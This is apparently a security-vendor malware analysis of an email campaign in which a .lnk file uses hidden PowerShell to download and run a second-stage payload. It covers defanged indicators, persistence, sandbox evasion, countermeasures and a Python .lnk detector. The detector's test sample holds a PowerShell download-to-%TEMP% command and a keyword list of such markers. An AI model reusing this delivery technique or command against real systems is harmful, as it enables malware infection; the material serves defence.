Email is one of the favorite methods used by attackers to infect systems. The malware used in email campaigns is often ransomware or banking malware.
We have recently seen some interesting tactical changes, including:
- Attachments with the malicious executable inside.
- Microsoft Office documents that contain a malicious macro. The macro will download ransomware or banking malware after execution.
- JavaScript files, executed by Wscript in Windows, dropping, for example, Locky ransomware.
We analyzed one recent email campaign with an attached .rar file. Inside this file, we found a .lnk file which, when executed, uses PowerShell to download a second stage of malware.
Let’s take a look at the .lnk file:
While investigating the file we saw this command:
This command executes if the file is run:
The .lnk file performs the following:
- Opens a hidden window.
- Downloads a file from the domain http://anonfile[.]xyz/f/7f58d7dddec4b72bab0fb27cd852593e[.]exe
- Saves the file in the %TEMP% folder as “windows.scr.”
- Executes the downloaded file.
It’s possible to retrieve the file directly:
Analyzing the dropped malware
Continuing with our analysis:
The downloaded file, %TEMP%\windows.scr, is executed by cmd.exe.
During execution the malware makes some changes to the infected machine that survive a reboot. Its persistence mechanism creates a scheduled task on the system using schtasks.
If we take a look at the binary we can extract its properties:
The malware is protected by the .NET obfuscator SmartAssembly, which makes it harder to reverse engineer and to extract further information from it.
We can load the malware to see more properties:
PowerShell plus .lnk offers stealth on many sandbox systems
Some companies and security researchers use crawlers and other automated pipelines for malware analysis. We tried to run this sample in some popular sandboxes to see its behavior. The analysis failed in some of them for a few reasons:
- The sandbox did not have PowerShell, so the .lnk could not download the malware.
- The .lnk failed when the sandbox tried to run it.
- The sandbox did not support .lnk files.
Thus in a real environment a sandbox might fail to determine whether this file is malicious.
One example of an error during execution:
The ideal scenario is to prepare the sandbox machine with PowerShell and ensure that it can execute .lnk files to see if they show malicious behavior.
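As an added example, not code from the McAfee post, the check below does statically what the sandboxes above could not do dynamically: it parses the StringData fields of a Shell Link file as defined in MS-SHLLINK and flags a PowerShell download command of the kind described earlier. The sample .lnk, the marker list and the example.invalid URL are constructed for this illustration.

```python
import struct

# Shell Link header (MS-SHLLINK 2.1): HeaderSize, CLSID, LinkFlags at offset 20, ShowCommand at 60
LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")
HAS_ID_LIST, HAS_LINK_INFO, IS_UNICODE = 0x01, 0x02, 0x80
# StringData sections appear in this fixed order when their LinkFlags bit is set
STRING_FIELDS = [(0x04, "name"), (0x08, "relative_path"), (0x10, "working_dir"),
                 (0x20, "arguments"), (0x40, "icon_location")]
# Heuristic markers (constructed for this example) for the behaviour described in the post
SUSPICIOUS = ("powershell", "-w hidden", "windowstyle hidden", "downloadfile",
              "downloadstring", "invoke-webrequest", "%temp%", "$env:temp", ".scr")

def parse_lnk(data: bytes) -> dict:
    """Return ShowCommand plus the StringData fields of a .lnk file."""
    if len(data) < 76 or data[:4] != b"\x4c\x00\x00\x00" or data[4:20] != LNK_CLSID:
        raise ValueError("not a shell link")
    flags = struct.unpack_from("<I", data, 20)[0]
    fields = {"show_command": struct.unpack_from("<I", data, 60)[0]}
    pos = 76
    if flags & HAS_ID_LIST:        # IDListSize (2 bytes) precedes the LinkTargetIDList
        pos += 2 + struct.unpack_from("<H", data, pos)[0]
    if flags & HAS_LINK_INFO:      # LinkInfoSize counts the whole LinkInfo structure
        pos += struct.unpack_from("<I", data, pos)[0]
    for bit, key in STRING_FIELDS:
        if not flags & bit:
            continue
        count = struct.unpack_from("<H", data, pos)[0]   # CountCharacters, no terminator
        pos += 2
        width = 2 if flags & IS_UNICODE else 1
        raw = data[pos:pos + count * width]
        fields[key] = raw.decode("utf-16-le" if width == 2 else "cp1252", "replace")
        pos += count * width
    return fields

def lnk_indicators(fields: dict) -> list:
    """Markers from SUSPICIOUS found in the target path, arguments and other strings."""
    text = " ".join(str(v) for v in fields.values()).lower()
    return [m for m in SUSPICIOUS if m in text]

def build_lnk(rel_path: str, args: str, show_cmd: int = 7) -> bytes:
    """Constructed minimal unicode .lnk (no IDList/LinkInfo); 7 = SW_SHOWMINNOACTIVE."""
    hdr = struct.pack("<I16sIIQQQIIIHHII", 0x4C, LNK_CLSID, 0x08 | 0x20 | IS_UNICODE,
                      0, 0, 0, 0, 0, 0, show_cmd, 0, 0, 0, 0)
    def enc(s):  # CountCharacters followed by UTF-16LE characters
        return struct.pack("<H", len(s)) + s.encode("utf-16-le")
    return hdr + enc(rel_path) + enc(args)

if __name__ == "__main__":
    sample = build_lnk(r"..\..\..\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                       "-w hidden -c \"(New-Object Net.WebClient).DownloadFile('http://example.invalid/x', $env:TEMP + '\\windows.scr')\"")
    print(lnk_indicators(parse_lnk(sample)))  # → ['powershell', '-w hidden', 'downloadfile', '$env:temp', '.scr']
```

Real samples usually carry an IDList and LinkInfo; the parser skips both by their declared sizes, so it can be pointed at an attachment pulled from quarantine as well as at the constructed sample.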
Countermeasures
To protect an organization, several countermeasures are effective against this type of threat.
- Modify the PowerShell execution policy using the Group Policy administrative templates.
- Allow the execution only of signed PowerShell scripts.
- Do not allow the saving of unknown .exe files in the %TEMP% folder.
- Do not allow the execution of unknown .exe files.
- Apply Windows restrictions such as AppLocker.
The idea is to capture some indicators of malicious activity performed on the infected machine and network to block the malware in your organization, and to combat similar future threats.
We found the malware connecting to IP address 174[.]127[.]99[.]183. This IP is located in the United States and shows other malicious activity, as we saw with VirusTotal:
After your investigation, you can use the indicators of compromise you find and apply countermeasures.
Hashes used during this analysis:
- 846e9c0631139cfdcbf270f8bdc08cdd39e9a89d
- 6c41bf5ead73e98c56397c37114f2c5a46fd2640